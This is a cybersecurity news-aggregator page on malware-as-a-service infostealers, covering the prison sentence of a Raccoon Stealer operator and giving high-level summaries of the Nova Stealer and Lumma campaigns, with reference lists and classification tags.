FlagThis - #MaaS

References :

• Cybernews: An operator of the Racoon Infostealer malware, who previously faked his own death, was sentenced to 60 months in federal prison.
• securityonline.info: Zscaler ThreatLabz has identified a new malware family, RiseLoader, which specializes in downloading and executing second-stage payloads.
• DataBreaches.Net: Ukrainian National Sentenced to Federal Prison in “Raccoon Infostealer” Cybercrime Case
• malware.news: Ukrainian National Sentenced to Federal Prison in “Raccoon Infostealer” Cybercrime Case
• www.bleepingcomputer.com: Ukrainian national Mark Sokolovsky was sentenced today to five years in prison for his involvement in the Raccoon Stealer malware cybercrime operation.
• Threats | CyberScoop: Ukrainian sentenced to five years in jail for work on Raccoon Stealer
• BleepingComputer: Ukrainian national Mark Sokolovsky was sentenced today to five years in prison for his involvement in the Raccoon Stealer malware cybercrime operation.
• malware.news: Raccoon Stealer operator jailed
• Help Net Security: Ukrainian national Mark Sokolovsky was sentenced to 60 months in federal prison for one count of conspiracy to commit computer intrusion. According to court documents, he conspired to operate the Raccoon Infostealer as a malware-as-a-service (MaaS).
• www.justice.gov: U.S. Department of Justice : Ukrainian national Mark Sokolovsky was sentenced to 60 months in prison for administering the Raccoon Infostealer malware-as-a-service (MaaS) business.
• securityaffairs.com: SecurityAffairs.com report on Raccoon Infostealer operator.

Classification:

• HashTags: #RaccoonStealer #Malware #Cybercrime
• Target: Raccoon Stealer Victims
• Attacker: Raccoon Stealer Operator
• Product: Raccoon Stealer
• Feature: Malware Operation
• Malware: Raccoon Stealer
• Type: Legal
• Severity: Major

Cybersecurity experts are warning of a widespread campaign involving Nova Stealer, a variant of SnakeLogger malware, now being sold as Malware-as-a-Service (MaaS) on underground forums. Priced as low as $50 for a 30-day license, Nova Stealer is designed to steal sensitive information, including credentials, keystrokes, screenshots, and clipboard data, making it an attractive tool for cybercriminals. This affordability and ease of deployment significantly lower the barrier for entry, enabling even novice attackers to launch sophisticated cyberattacks, especially targeting industries such as finance, retail, and IT.

The malware is often distributed through phishing emails disguised as legitimate documents. Once executed, Nova Stealer employs sophisticated techniques to evade detection, including steganography and process hollowing, while exploiting Windows utilities like PowerShell to disable Microsoft Defender. Stolen data is exfiltrated via channels such as SMTP, FTP, or Telegram APIs, and can be leveraged for identity theft, financial fraud, and ransomware attacks. The rise of Nova Stealer highlights the persistent threat posed by information stealers in the cybercrime ecosystem.


References :

• gbhackers.com: Beware of Nova Stealer Malware Sold for $50 on Hacking Forums
• securityonline.info: $50 for Your Data: NOVA Stealer Sold as Malware-as-a-Service
• securityonline.info: The BI.ZONE Threat Intelligence team has reported a significant ongoing campaign distributing the NOVA stealer, a new commercial
• gbhackers.com: The cybersecurity landscape faces a new challenge with the emergence of Nova Stealer, a malware marketed under the Malware-as-a-Service (MaaS) model.
• cyberpress.org: Cybercriminals Selling Nova Stealer Malware for $50 on Dark Web

Classification:

• HashTags: #NovaStealer #Malware #Cybersecurity
• Target: Individuals and Organizations
• Attacker: Nova Stealer
• Feature: Malware-as-a-Service
• Malware: Nova Stealer
• Type: Malware
• Severity: Major

Lumma, an advanced information stealer, has become a dominant force in the cybercrime landscape throughout 2024. Marketed as Malware-as-a-Service (MaaS), it is readily available on Russian-speaking forums and Telegram channels. This malware targets Windows systems, aiming to exfiltrate credentials, cryptocurrency wallet data, browser information, and two-factor authentication details. Lumma employs sophisticated methods such as binary morphing and server-side data decryption to avoid detection. It operates on a subscription basis, with tiered plans offering features such as customizable log management, data filtering, and advanced stealth capabilities, making it accessible to both novice and experienced cybercriminals.

Lumma’s capabilities are extensive and include data exfiltration, regular updates, and the ability to collect detailed data logs, as well as the capability to download additional malware to compromised systems. It has been observed in multiple campaigns that use techniques like phishing, malvertising, and fake software updates. These campaigns have targeted a diverse range of sectors including manufacturing, transportation, and individuals such as gamers, users of cracked software, and cryptocurrency enthusiasts. The developers of Lumma have implemented policies to avoid targeting Russia, further demonstrating the malware's reach beyond Russian-speaking regions.


References :

• malware.news: Lumma 2024: Dominating the Info-Stealer Market
• www.infostealers.com: Lumma 2024: Dominating the Info-Stealer Market
• www.esentire.com: The malware is managed via an easy-to-use interface, making it accessible even to less technically skilled users

Classification:

• HashTags: #Malware #InfoStealer #MaaS
• Target: Various Users
• Product: malware
• Feature: information stealing
• Malware: Lumma
• Type: Malware
• Severity: Major